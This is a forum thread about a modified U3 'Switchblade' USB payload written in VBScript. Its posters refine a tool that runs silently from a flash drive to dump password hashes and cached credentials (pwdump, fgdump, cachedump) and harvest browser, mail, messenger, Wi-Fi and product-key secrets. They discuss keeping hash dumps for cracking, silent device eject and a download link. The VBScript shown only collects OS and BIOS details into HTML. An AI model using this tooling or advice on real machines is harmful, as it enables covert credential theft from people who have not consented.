Jump to content

Beakmyn's Switchblade (mod of Gonzor) written in vbs with HTML output


beakmyn
 Share

Recommended Posts

This version doesn't use SBConfig. It require that the user be able to open the Payload.ini in Notepad (or other text editor) and manually make edits to the ini file.

width=639 height=445http://www.frontiernet.net/~beakmyn/output.jpg[/img]

I found a couple issues. Since I used the Winaudit html layout as an example I missed a title block and it will say

"WinAudit Freeware v2.27 Unicode"  :lol: Woops, not sure how that one slipped past.

Also, if you're going to use this to run an audit against a Windows XP Home edition machine be sure to disable cachedump, It doesn't appear to exit gracefully and hangs. This is an issue with cachedump and the fact that a XP home edition can not be part of a Windows domain so no cache information will exist.

I think I'll add some checking to force certain tools not to run if the system is XP Home and possibly if you don't have admin since the tools will fail anyway.

I'll make the fixes and re-post a new file.

Oh, to view the file click on the Computername-date-time.html not the "left" or "right" file.

Link to comment
Share on other sites

Great Payload, i really <3 the html output!!!  :-P

Link to comment
Share on other sites

I downloaded.. I installed... I messed up. It stalls with wscript in task manager and sits there (if I try and run payload.vbs I get 'error 3 cannot find the path specified'  *where exactly does payload.ini go? I assume flash partition /SRC/payload.ini

If at first you dont succeed, hak hak again. I think this needs the kill switch though (if safety.txt in C goto end). But maybe I'll get it working today.. Also, since your creating you html output could you goose this thing to make a copy of the wpl files in the folder (windows activation *if OS == WindowsXP not sure how that would work)? And make the path for the log changeable (to documents folder or something I wouldnt have to dive into hidden folders to find).

Just my 2 cents

I did find out I needed to update the stock launchpad to get Vista compatibility... but that doesnt count twords this

Yet another update... why are there shortcuts for sbs and sbs2 (pointing to openssh and a path to the desktop)

Link to comment
Share on other sites

I downloaded.. I installed... I messed up. It stalls with wscript in task manager and sits there (if I try and run payload.vbs I get 'error 3 cannot find the path specified'  *where exactly does payload.ini go? I assume flash partition /SRC/payload.ini

If at first you dont succeed, hak hak again. I think this needs the kill switch though (if safety.txt in C goto end). But maybe I'll get it working today.. Also, since your creating you html output could you goose this thing to make a copy of the wpl files in the folder (windows activation *if OS == WindowsXP not sure how that would work)? And make the path for the log changeable (to documents folder or something I wouldnt have to dive into hidden folders to find).

payload.ini should be in the flashdrive partition src folder.

payload.vbs can not be run without providing the path to the U3 and flash partition (look at how I call it in autorun), I figured it was easy to pass the paths rather the re-run the drive search utility.

I'll add an option for output directory into the payload.ini,

I'll add a safety.txt option also

I'd have to see it lock up to know what it was trying to do. What the last thing in the html? Because I'm bypassing error handling in the vbs it makes it harder to debug. If you wanted I could work with you on manually running it without the "on error resume next" so we could debug it.

Just my 2 cents

I did find out I needed to update the stock launchpad to get Vista compatibility... but that doesnt count twords this

Hmm, I thought it had the latest vista capable launchpad. I'll have to get the latest.

Yet another update... why are there shortcuts for sbs and sbs2 (pointing to openssh and a path to the desktop)

I think that is for the haksaw, which isn't implemented/tested yet in my code. I'll remove the files and fix the payload since I have no intention of adding them in.

I'm still working on a bullet-proof silent device eject.

I'll get an update out early next week.

Link to comment
Share on other sites

For whatever reason (I cant say for certain since this one is relatively new) the default in your ini us FWDump, when its selected cachedump still tries to run and FWDump stalls. When however cachedump is selected it goes smooth as silk.

Going to dive a bit further into your code this week and see what I can see.

Link to comment
Share on other sites

For the Cachedump I use either fwdump -w, this tells it to skip dumping passwords and dump the cache or Cachedump

Interestingly, I found that on my test machine (XP Pro) using the fgdump worked but using the cachedump (Gonzor's bundled version 1.x) would hang, the opposite of what you see happening.

However, my payload now uses Cachedump 1.3

Note: Versions 1.0, 1.1 and 1.2 of cachedump all reported as 1.0 when queried for version. This was fixed in 1.3

Cachedump is really only valid when a user logs on using a domain account but is not connected to the domain. Since this seems to be a common sticking point I'm looking into implementing a watchdog timer. So, if the program doesn't close within X seconds I'll force it to close. X would be configured via the payload.ini, typically it should be 2-5 seconds.

Link to comment
Share on other sites

How does one know when he is really bored....

http://harrea.100webspace.net/SysInfo.jpg

    Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime")

    Set objWMIService = GetObject("winmgmts:" _
     &amp; "{impersonationLevel=impersonate}!.rootcimv2")

    Set colOSes = objWMIService.ExecQuery("Select * from Win32_OperatingSystem")
    For Each objOS in colOSes
            objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Logged On User&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; strUserName  &amp; "&lt;/td&gt;&lt;/tr&gt;"
            objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Computer Name&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.CSName  &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Caption&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.Caption    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Build Number&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; objOS.BuildNumber  &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Build Type&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.BuildType  &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Boot Device&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.BootDevice    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Country Code&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.CCountryCode    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Debug&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.Debug    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Encryption Level&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.EncryptionLevel    &amp; "&lt;/td&gt;&lt;/tr&gt;"
            dtmConvertedDate.Value = objOS.InstallDate
            dtmInstallDate = dtmConvertedDate.GetVarDate
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Install Date&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; dtmInstallDate    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Licensed Users&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.NumberOfLicensedUsers    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Organization&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.Organization    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Language&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.Language    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;OS Type&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.OSType  &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Primary OS&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.Primary  &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Registered User&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.RegisteredUser  &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Serial Number&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.SerialNumber  &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Other Type Description&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.OtherTypeDescription  &amp; "&lt;/td&gt;&lt;/tr&gt;"        
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Version&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objOS.Version  &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Service Pack&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp;  objOS.ServicePackMajorVersion &amp; "." &amp; _
       objOS.ServicePackMinorVersion  &amp; "&lt;/td&gt;&lt;/tr&gt;"

    Next

    Set dtmConvertedDate = Nothing
    Set objWMIService = Nothing
    Set colOSes = Nothing
    'End Table

http://harrea.100webspace.net/BIOS.jpg

    objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;"
    objRightFile.WriteLine"&lt;p&gt;&lt;font size=""3""&gt;&lt;b&gt;BIOS&lt;/b&gt;&lt;/font&gt;"
    objRightFile.WriteLine"&lt;hr color=""#0066cc"" size=""2"" width=""400""&gt;"
    objRightFile.WriteLine "&lt;table align=""center"" bgcolor=""#ffffff"" border=""1"" cellpadding=""2"" cellspacing=""0"" frame=""box"" rules=""all""&gt;&lt;tbody&gt;&lt;tr&gt;" &amp; _
    "&lt;td class=""colhead""&gt;&lt;b&gt;Item&lt;/b&gt;&lt;/td&gt;" &amp; _
    "&lt;td class=""colhead""&gt;&lt;b&gt;Value&lt;/b&gt;&lt;/td&gt;&lt;/tr&gt;"

    Set dtmConvertedDate = CreateObject("WbemScripting.SWbemDateTime")
    
    Set objWMIService = GetObject("winmgmts:" _
     &amp; "{impersonationLevel=impersonate}!.rootcimv2")

    Set colBIOS = objWMIService.ExecQuery("Select * from Win32_BIOS")
    For Each objBIOS in colBIOS
            objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Build Number&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.BuildNumber  &amp; "&lt;/td&gt;&lt;/tr&gt;"
            objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Current Language&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.CurrentLanguage  &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Manufacturer&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.Manufacturer    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Name&lt;/b&gt;&lt;/td&gt;&lt;td&gt;"&amp; objBIOS.Name  &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Primary BIOS&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.PrimaryBIOS  &amp; "&lt;/td&gt;&lt;/tr&gt;"
            dtmConvertedDate.Value = objBIOS.ReleaseDate
            dtmReleaseDate = dtmConvertedDate.GetVarDate
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Release Date&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; dtmReleaseDate    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Serial Number&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.SerialNumber    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;SMBIOS Version&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.SMBIOSVersion    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;SMBIOS Major Version&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.SMBIOSMajorVersion    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;SMBIOS Minor Version&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.SMBIOSMinorVersion    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;SMBIOS Present?&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.SMBIOSPresent    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Status&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.Status    &amp; "&lt;/td&gt;&lt;/tr&gt;"
        objRightFile.WriteLine "&lt;tr&gt;&lt;td&gt;&lt;b&gt;Version&lt;/b&gt;&lt;/td&gt;&lt;td&gt;" &amp; objBIOS.Version  &amp; "&lt;/td&gt;&lt;/tr&gt;" &amp; _
        "&lt;/td&gt;&lt;/tr&gt;"

    Next
    Set dtmConvertedDate = Nothing
    Set objWMIService = Nothing
    Set colBIOS = Nothing
    'End Table
    objRightFile.WriteLine "&lt;/tbody&gt;&lt;/table&gt;&lt;/p&gt;&lt;p&gt; &lt;/p&gt;"

Link to comment
Share on other sites

Beak... you get a chance add me to your messenger I got alot of this hammered out with html and what not but some things are driving me up a wall but cant get a handle on the problem.. for example the pwdump file is marked for delete in the ini but the damn thing doesnt die. Just leaves the file in the directory regardless of the setting.

Link to comment
Share on other sites

Yeah, that happens sometimes. It's not a bad thing if they're left there IMHO, as it's easier to use the dump file rather then extract the hash from the html file if you need to use it JTR or OPH. I have better luck with fgdump, btw.

I'm going to variablize as much of the script as possible to make it easier to work with. I have 1.5GB of programs on my drive and it's a pain to have to reflash to test (takes 30-45min).

Link to comment
Share on other sites

Just to give everybody a heads up of what's being tested:

OS specific running of payload

checking if user is admin to prevent running code that requires admin privelege

Copy wpa file to stick

configurable log path

Don't run cachedump if machine isn't member of a domain

better clean-up

BIOS info

Link to comment
Share on other sites

Version 0.3.1

Payload alteration:

Minor typo in XP activation backup (missing space between hardware & modification)

Changed path of wpa.dbl (in case reran and new lisc. was copied to prevent overwritting files)

Removed additional lang help files from launchpad.zip (freed up @ 200k)

Added 5 second watchdog timer to pwdump,fgdump and cachedump. If they don't finish within 5 seconds

they're terminated.

Nir changed his html output so I made mine a bit more flexible at finding the data in the html.

IEHV from 1.3.1.0 to 1.3.6.0

Added new option: Show All Google Searches.

1.35 Updated the 'Select User Profile' option to work properly under Vista.

1.34 Dates are now formatted according to user locale, instead of system locale in previous versions.

1.33 A tooltip is displayed when a string in a column is longer than the column length. New option: Copy URL. (Copy to the clipboard only the URL)

1.32 Fixed bug: '???????????' string appeared in the title, while it should be empty. Fixed bug: Wrong 'Modified Date' values on IE6 with XP/SP2 and IE7.

IEPV from 1.0.4.0 to 1.0.7.0

Version 1.07 Fixed bug: IE PassView failed to detect the AutoComplete passwords of URLs the end with '/' character (On Internet Explorer 7). Added support for Web sites file (iepv_sites.txt) - for decrypting the passwords of Internet Explorer 7.0 even when the history file is empty.

Version 1.06 The configuration is now saved to a file instead of the Registry.

Version 1.05 Fixed a small bug that caused IE PassView to hang in some computers.

Version 1.04 Added support for IE7 under Windows Vista.

MAILPV from 1.3.8.142 to 1.4.2.148

1.42  Added support for retrieving Hotmail/MSN mail accounts from the latest version of Windows Messenger. Added support for Gmail Notifier application under IE7. 

1.41  Configuration is now saved to a file instead of the Registry. 

1.40  Added support for SMTP and NNTP accounts on Windows Mail. Fixed problems with Thunderbird 2 accounts. 

MSPASS from 1.1.0.125 to 1.1.6.133

Version 1.16 - Added support for Google Talk password, if it's stored by Google Desktop.

Version 1.15 - The configuration is now saved to a file instead of the Registry.

Version 1.14 - Added support for AIM 6.x and AIM pro.

Version 1.13 - Windows Live Messenger passwords are now shown under Vista even without admin rights.

Version 1.12 - Fixed bug: Pidgin passwords were not shown when using the save command-line options.

Version 1.11 - Added support for Pidgin (Successor of GAIM)

NETPASS from 1.1.0.0 to 1.1.2.0

Version 1.12: The configuration is now saved to a file instead of the Registry.

Version 1.11: Under Vista, this utility now runs as admin automatically. You don't have to explicitly choose the "Run As Administrator" option.

PRODUKEY from 1.0.6.0 to 1.1.0.0

Version 1.10: Added filters by product type.

Version 1.08: The configuration of ProduKey is now saved to a file instead of the Registry.

Version 1.07: Added support for product key of Ms-Office under x64, when it's retrieved from external Registry file.

WIFIKE from 1..3.0 to 1.1.5.0

Version 1.15 - Added support for deleting the wireless keys of old network adapters.

WUL from 1.1.3.18 to 1.2.1.22

Version 1.20: Changed Operating System column to Application. Added filter by application (Windows, .NET, and others) Added 'Last Modified Time' column. Fixed Web link for .NET Updates. Configuration is now saved to cfg file instead of the Registry. Updates with extra sub-key level (in the Registry) are now displayed properly.

Version 1.13: A tooltip is now displayed when a string in a column is longer than the column length.

http://rapidshare.com/files/79403074/switc...e0.3.2.zip.html

Link to comment
Share on other sites

  • 1 month later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...